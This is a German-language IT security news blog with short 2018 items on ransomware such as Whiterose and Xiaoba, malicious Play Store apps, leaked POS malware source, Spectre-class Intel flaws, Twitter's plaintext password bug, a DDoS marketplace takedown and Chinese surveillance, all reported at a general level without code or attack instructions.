Nicht jeder, der Ransomware entwickelt, will sich damit die Taschen füllen. Wie auch im Falle der Erpressersoftware Whiterose. Wie andere Schadprogramme dieser Art, verschlüsselt Whiterose nach der Infektion Dokumente sowie Bild- und Videodateien diverser Formate. Sie gibt diesen die Dateiendung ".whiterose". 

Wie die Ransomware auf den infizierten Rechnern landet, ist unklar. Möglicherweise wird sie manuell installiert, wenn das Opfer einen Remote-Desktop-Dienst nutzt. Die Verschlüsselung wurde jedoch bereits geknackt und lässt sich auch ohne Lösegeldzahlung wieder beheben. 

Also: kein Grund zur Panik und stattdessen viel Zeit, sich den Erpresserbrief einmal genauer anzusehen, wie Bleepingcomputer dies tat. Der Erpresserbrief ist nämlich höchst ungewöhnlich und wirkt viel mehr wie eine literarische Erzählung – stellenweise sogar fast wie ein Gedicht. 

Es geht um einen einsamen Hacker, der nichts hat, ausser einem leeren Haus und einem Garten voller weisser Rosen. Also entschied er sich, allen Menschen auf der Welt ein Geschenk zu machen: eine weisse Rose, die in den Systemen der Beschenkten wächst. Genau wie in seinem Garten. 

"I hope you accept this gift from me and if it reaches you, close your eyes and place yourself in a large garden on a wooden chair and feel this beautiful scene to reduce your anxiety and everyday tension."

White Rose (Source: Netzmedien)

(Source: Netzmedien)

11.05.2018 - 17:44 Uhr

Was Nutzer wohl von starken Passwörtern halten

Die deutschen Comic-Autoren Elizabeth Pich and Jonathan Kunz von War and Peas haben sich mit starken Passwörtern befasst und was sie wohl davon halten graphisch umgesetzt. Mehr Comics des Duos gibt’s an dieser Stelle
Weak Passwords von War and Peas.(Source: Warandpeas.com)

11.05.2018 - 17:41 Uhr

Tarnspezialisten schleichen sich erneut in Googles Play Store

Die Sicherheitsexperten von Symantec haben sieben Wiederholungstäter im Google Play Store entdeckt. Dabei handelt es sich um sieben bösartige Apps, die schon einmal aus dem Play Store entfernt wurden, wie das Unternehmen mitteilt

Für die neue Welle haben die dafür verantwortlichen Cyberkriminellen lediglich den Namen der App sowie des angeblichen Herausgebers leicht angepasst. Der Code der App sei jedoch noch derselbe. Bei den Apps handle es sich um sehr unterschiedliche Applikationen - darunter eine Emoji-Tastatur, ein Taschenrechner, eine Verschlüsselungs-App sowie Tools, um Anrufe aufzunehmen oder Speicherplatz freizugeben.

Die Apps würden jedoch nicht wie angepriesen funktionieren, schreibt Symantec. Stattdessen übt sich die Malware in Geduld. Sie lauert, damit das Opfer die App und eventuelle verdächtige Aktivitäten des Smartphones nicht in Zusammenhang bringe.

Nach vier Stunden versteckt sich die Malware nicht länger und wechselt von defensiver zu aggressiver Mimikry: Sie bittet um Admin-Rechte und nutzt dabei Google-Embleme, damit das Opfer die Anfrage für legitim hält. Anschliessend ändert die Malware auch ihr Icon zu einem Google-Symbol, wie etwa das von Google Maps oder von Google Play.

In der aktuellen Version leitet die Malware den Browser um. So landet der irregeführte Nutzer auf Scam-Seiten, die ihm weismachen sollen, er habe bei einem Wettbewerb gewonnen. Das Ziel dahinter: persönliche Daten sammeln und verkaufen. 

11.05.2018 - 17:35 Uhr

POS-Malware wird Open Source

Die Point-of-Sale-Malware Treasurehunter ist bereits seit 2014 im Visier von IT-Sicherheitsexperten. Die Malware befällt Kassensysteme am Verkaufsort (auf Englisch: Point of Sale – POS) und stiehlt Kreditkarteninformationen. Bald könnten derartige Schadprogramme noch viel zahlreicher werden.

Der Quellcode von Treasurehunter wurde unlängst in einem russischsprachigen Forum veröffentlicht, wie IT-Security-Anbieter Flashpoint mitteilt. Der Quellcode für die graphische Benutzeroberfläche sowie für das Admin-Dashboard sind ebenfalls online aufgetaucht. 

Dies senke die Einstiegshürde für Cyberkriminelle, schreibt Flashpoint. Mit den bereitgestellten Source-Codes könnten sie ihre eigenen Varianten der Treasurehunter-Malware entwickeln. Zugleich gibt die Veröffentlichung des Quellcodes jedoch auch Security-Experten eine Chance, ihre Abwehrmassnahmen zu verbessern. 

04.05.2018 - 18:53 Uhr

G Data warnt vor der dunklen Seite … im Umgang mit Datenpannen

(Source: G Data)

(Source: G Data)

Der deutsche Sicherheitsanbieter G Data hat für einen Tag einen neuen Slogan neben seinem Logo: "Trust in Imperial Sicherheit". Nein, es handelt sich dabei nicht um eine neue Marketing-Kampagne. Der Sicherheitsanbieter feiert stattdessen den 4. Mai.

Der 4. Mai ist nämlich Star Wars Day. Nicht, weil der erste Film der Science-Fiction-Reihe ursprünglich an diesem Tag ins Kino kam - das war nämlich am 25. Mai 1977. Sondern weil das Datum auf Englisch ("May the Forth") ähnlich klingt wie der bekannte Wahlspruch aus den Filmen ("May the Force be with you").

G Data nutzt den Star-Wars-Tag, um Tipps für einen besseren Umgang mit Datenpannen zu geben. Denn, wie der Sicherheitsanbieter schreibt, das Imperium weiss nicht, wie Datensicherheit funktioniert.

So sei es etwa nicht sinnvoll, sich ein Beispiel an Darth Vader zu nehmen und die Mitarbeiter zu töten, die schlechte Neuigkeiten überbringen. Viel besser mache es da Kylo Ren, der zerstöre lediglich seinen Computer. 

Mehr Tipps finden sich hier

04.05.2018 - 18:14 Uhr

Intel kommt nicht zur Ruhe

2018 dürfte als das wohl dunkelste Jahr in Intels bisheriger Firmengeschichte eingehen. Anfang des Jahres wurden zwei massive Sicherheitslücken bekannt: Spectre und Meltdown. Die Lücken steckten in der grundlegenden Prozessorarchitektur fast aller modernen Chips. Patches folgten, die Wogen glätteten sich.

Der PR- und vor allem IT-Security-Albtraum ist aber noch nicht vorbei. Sicherheitsforscher entdeckten acht neue Sicherheitslücken in Intel-CPUs, wie das Technikmagazin C’T schreibt. Im Kern seien diese auf dasselbe Design-Problem zurückzuführen. Das Magazin spricht in dem Zusammenhang von Spectre Next Generation – solange sie noch keine eigenen Namen erhalten haben. 

Jede der acht Lücken habe einen eigenen CVE-Eintrag im Verzeichnis aller Sicherheitslücken erhalten und jede erfordere einen eigenen Patch. Vier wurden als "hohes Risiko" eingestuft, das Risiko der restlichen vier als "mittel". Das Bedrohungspotenzial einer dieser Lücken sei jedoch grösser als bei Spectre und könnte auch für Cloud-Hoster zur Gefahr werden.

Das Magazin bestätigte die Lücken in Intels Chips. Einzelne ARM-Prozessoren seien jedoch ebenfalls anfällig. Ob die eng verwandte ARM-Architektur auch betroffen ist, konnte C’T noch nicht ermitteln. Die neuen Lücken zeigen jedoch, dass Spectre und Meltdown keine einmaligen Probleme waren. Prozessorarchitekturen seien eher mit Schweizer Käse zu vergleichen, aufgrund all der Sicherheitslücken.

04.05.2018 - 17:40 Uhr

Twitter speicherte Passwörter in Klartext

Der Mikroblogging-Dienst Twitter musste diese Woche ein kleines Malheur eingestehen. Eigentlich speichere das Unternehmen keine Passwörter von Nutzern in Klartext. Zu diesem Zweck nutzt Twitter eine Hashing-Funktion (bcrypt). Dieser ersetzt die Passwörter mit einer Kombination aus Zahlen und Buchstaben.

Eigentlich. Denn ein Bug hatte sich in diesen Prozess hineingeschlichen, wie Twitters CTO Parag Agrawal in einem Blogeintrag schreibt. Dieser führte dazu, dass die Passwörter in einer internen Log-Datei gespeichert wurden, bevor sie den Hash-Prozess abgeschlossen haben.

Twitter habe das Problem selber entdeckt und auch bereits wieder behoben. Ihre eigenen Untersuchungen seien zu dem Schluss gekommen, dass keine Passwörter entwendet wurden. Dennoch empfiehlt das Unternehmen seinen Nutzern, ihre Passwörter zu ändern und künftig auf eine Zwei-Faktor-Authentifizierung zu setzen. 

04.05.2018 - 17:09 Uhr

Länder werden zur Ransomware-Dateiendung

Die Sicherheitsexperten vom Malware Hunter Team warnen auf Twitter vor einer neuen Ransomware. Es handelt sich dabei um eine neue Ausführung der Xiaoba genannten Erpressersoftware.

Hat die Ransomware einmal einen Rechner infiziert, verschlüsselt sie Dateien und verpasst ihnen die Dateiendung ".china". Laut dem Malware Hunter Team ist das wohl die erste Ransomware, die einen Ländernamen als Dateiendung nutzt. 

Mehr Infos gibt's in der Malware-Datenbank Virustotal.

02.05.2018 - 17:45 Uhr

Check Point findet Code von Trend Micro in nordkoreanischer AV-Lösung

Das Ganze klingt ein wenig wie der Anfang eines Thrillers. Der israelische Sicherheitsanbieter Check Point machte einen interessanten Fang – und fand darin etwas noch Interessanteres.

Das Unternehmen erhielt eine seltene Kostprobe der nordkoreanischen Anti-Virus-Lösung (AV) Silivaccine, wie Check Point in einem Blogeintrag schreibt. Die Kostprobe kam vom freien Journalisten Martyn Williams. Williams seinerseits erhielt die Software als Zip-Datei via Dropbox – den Link dazu bekam er per E-Mail von einem gewissen Kang Yong-hak.

Der Absender – der sich trotz des koreanischen Namens als japanischer Ingenieur ausgab – ist unterdessen nicht mehr erreichbar. Seine Mailbox wurde deaktiviert. Die Zip-Datei beinhaltete neben der AV-Software auch eine Readme-Datei auf Koreanisch sowie einen angeblichen Update-Patch. Dabei handelte es sich jedoch um die Malware Jaku, die genutzt wird, um Botnetze zu erschaffen.

Vertrauter Code in fremder Lösung

Als sich der Sicherheitsanbieter in den Code der AV-Lösung vertiefte, kam ihm einiges bekannt vor. Die Entwickler von Silivaccine kopierten laut dem Bericht ganze Code-Blöcke von Trend Micro, einem japanischen Konkurrenten von Check Point.

Trend Micro bestätigt in einem Statement gegenüber Check Point, dass die Softwareprobe eine über zehn Jahre alte Version seiner Scan-Engine nutzt. Diese sei weit verbreitet und werde in vielen Produkten genutzt – auch von Drittanbietern.

Trend Micro betont, dass das Unternehmen in oder mit Nordkorea keine Geschäfte mache und dass ihre Technologie illegal genutzt werde. Rechtlich gegen Silivaccine vorgehen will das Unternehmen dennoch nicht – das sei nicht produktiv.

Die Entwickler von Silivaccine nahmen jedoch eine bewusste Änderung an Trend Micros Code vor. Silivaccines Version des Scan-Moduls ignoriert eine bestimmte Signatur, die sie normalerweise blockieren würde. Worum es sich dabei handelt, kann Check Point zwar nicht sagen. Doch es sei klar, dass das nordkoreanische Regime nicht wolle, dass seine Bürger darüber Bescheid wüssten.

27.04.2018 - 20:03 Uhr

Europol nimmt grössten Anbieter von DDoS-as-a-Service vom Netz

Bis vor kurzem konnte man auf Webstresser.org noch DDoS-Attacken ab 15 Euro pro Monat kaufen. Die Abkürzung steht für Distributed Denial of Service. Dabei wird ein Webdienst mit derart vielen Anfragen überhäuft, dass er den Dienst quittieren muss. In den letzten Jahren nahm die Stärke der Attacken drastisch zu. Mittlerweile erreichen sie Bandbreiten von bis zu 1,7 Terabit pro Sekunde - genug um eine Website regelrecht vom Netz zu fegen. Waren früher noch gewisse IT-Fähigkeiten notwendig für derartige Attacken, können Böswillige mit tiefen Taschen sie heutzutage auch auf diversen Marktplätzen einfach kaufen. 

Webstresser.org gehörte zu den grössten Marktplätzen dieser Art, wie Europol mitteilt. Die Plattform zählte mehr als 136'000 registrierte Benutzer. 4 Millionen DDoS-Attacken sollen hier ausgehandelt worden sein. Diese richteten sich gemäss Mitteilung gegen kritische Online-Dienste, Finanzinstitute, Regierungseinrichtungen, Polizeikräfte und gegen Ziele in der Gaming-Industrie.

In einer koordinierten internationalen Aktion von Europol und verschiedenen lokalen Polizeieinheiten wurde den Drahtziehern hinter dem Marktplatz nun der Stecker gezogen. Die Infrastruktur wurde beschlagnahmt. Die Administratoren lebten im Vereinigten Königreich, Kroatien, Kanada und Serbien. Zugleich gingen die Strafverfolgungsbehörden in mehreren Ländern aber auch gegen die grössten Kunden der DDoS-Plattform vor: darunter die Niederlande, Italien und Spanien.

Wer DDoS-Attacken ausführt, ermöglicht oder als Dienst verkauft, muss gemäss Mitteilung mit Geld- und Haftstrafen rechnen. 

 

27.04.2018 - 18:50 Uhr

老大哥 is watching you

Der Roman 1984 von George Orwell beschreibt eine dystopische Zukunft, in der ein Staat jeden einzelnen Schritt seiner Bürger überwacht. Die mittlerweile ubiquitäre Phrase "Big Brother is watching you" hatte ihren Ursprung in dem Roman. Orwell schrieb das Buch vor rund 70 Jahren. Die Geschichte gewinnt aber immer mehr an Relevanz. Jüngstes Beispiel: China. Während die EU mit der EU-DSGVO (beziehungsweise GDPR) gerade den Datenschutz verschärft, testet die chinesische Regierung in Shanghai und Chongqing die totale Überwachung. 

Die Regierung überwacht etwa Kreuzungen mit Videokameras, damit keiner ungesehen bei rot über die Strasse wandert, wie die SRF Rundschau berichtet. Die Regierung habe aber auch auf die Daten privater Firmen Zugriff - darunter der Internetgigant Alibaba und dessen mobile Bezahllösung Alipay. So kann die Regierung also auch verfolgen, wofür ihre Bürger ihr Geld ausgeben. 

Das offizielle Ziel: bessere Bürger schaffen. Gutes Verhalten soll belohnt werden, schlechtes geahndet. Die Bürger erhalten laut dem SRF-Beitrag sogenannte "Sesame Credits". Diese sind öffentlich einsehbar und reichen von 300 bis 900. Mehr Punkte, mehr Vorteile. Personen mit einem tiefen Kredit sollen in ihrer Bewegungsfreiheit eingeschränkt werden. Sie dürfen etwa nicht mehr mit dem Zug fahren oder Flüge buchen.

Wie der Bericht zeigt, büssen die Bürger ihre Credits aber auch ein, wenn sie nicht der politischen Linie der Kommunistischen Partei Chinas folgen. 1984, das Buch von Orwell sei unterdessen verboten worden in China. 

27.04.2018 - 17:52 Uhr

Die grössten Malware-Bedrohungen in der Schweiz im März

Die Sicherheitsexperten des israelischen IT-Security-Anbieters Check Point haben eine Liste zusammengestellt mit der am stärksten verbreiteten Malware in der Schweiz. Die Liste zeigt die Top-Malware des Monats März. Gleich drei Crypto Miner haben es unter die Top 10 geschafft.

Dabei handelt es sich um Javaskripte, die sich in Websites und Applikationen verbergen lassen. Ohne Mitwissen der Opfer zapfen sie die Rechenleistung der infizierten Geräte an, um nach Kryptowährungen zu schürfen. Das Opfer zahlt die Stromkosten für einen Rechner, den es eventuell gar nicht nutzen kann und der Hacker verdient sich eine goldene Nase.

Die Top 10 gemäss Check Point:

  1. Coinhive (Crypto Miner)
  2. Rig EK (Exploit Kit)
  3. Cryptoloot (Crypto Miner)
  4. Roughted (Malvertising)
  5. Jsecoin (Crypto Miner)
  6. Necurs (Botnet)
  7. Fireball Adware)
  8. Virut (Botnet)
  9. Andromeda (Botnet/Backdoor)
  10. Conficker (Computerwurm)

Die Nummer 10, der Computerwurm Conficker (auch bekannt als Downadup), ist erstaunlicherweise bereits seit 10 Jahren aktiv. Obwohl der Wurm eine Schwachstelle nutzt, die bereits ebenso lange gepatcht ist. In ihrem jüngsten Halbjahresbericht widmete sich die Melde- und Analysestelle Informationssicherung ebenfalls dem Computerwurm Conficker.

 

 

Webcode
SecurityBlog

Dossiers

» Mehr Dossiers

Aktuelle Ausgabe

Direkt in Ihren Briefkasten CHF 60.- » Magazin Abonnieren » Zum shop » Newsletter